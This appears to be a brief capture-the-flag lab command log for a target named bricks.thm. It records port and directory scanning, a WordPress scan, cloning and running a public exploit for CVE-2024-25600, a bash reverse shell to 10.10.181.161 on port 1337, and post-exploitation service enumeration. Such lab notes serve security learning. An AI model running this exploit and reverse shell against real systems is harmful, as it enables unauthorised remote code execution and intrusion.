Add hostname to host file
echo $VICTIM bricks.thm >> /etc/hosts
cat /etc/hosts
nmap -sV -sT -O -p 1-65535 $VICTIM
gobuster dir -u http://bricks.thm -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
gobuster dir -k -u https://bricks.thm -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
wpscan --url https://bricks.thm/ --disable-tls-checks
git clone https://github.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT.git
cd CVE-2024-25600-EXPLOIT/
python CVE-2024-25600.py -u https://bricks.thm/
bash -c 'exec bash -i >& /dev/tcp/10.10.181.161/1337 0>&1'
systemctl list-units --type=service --state=running
systemctl cat ubuntu.service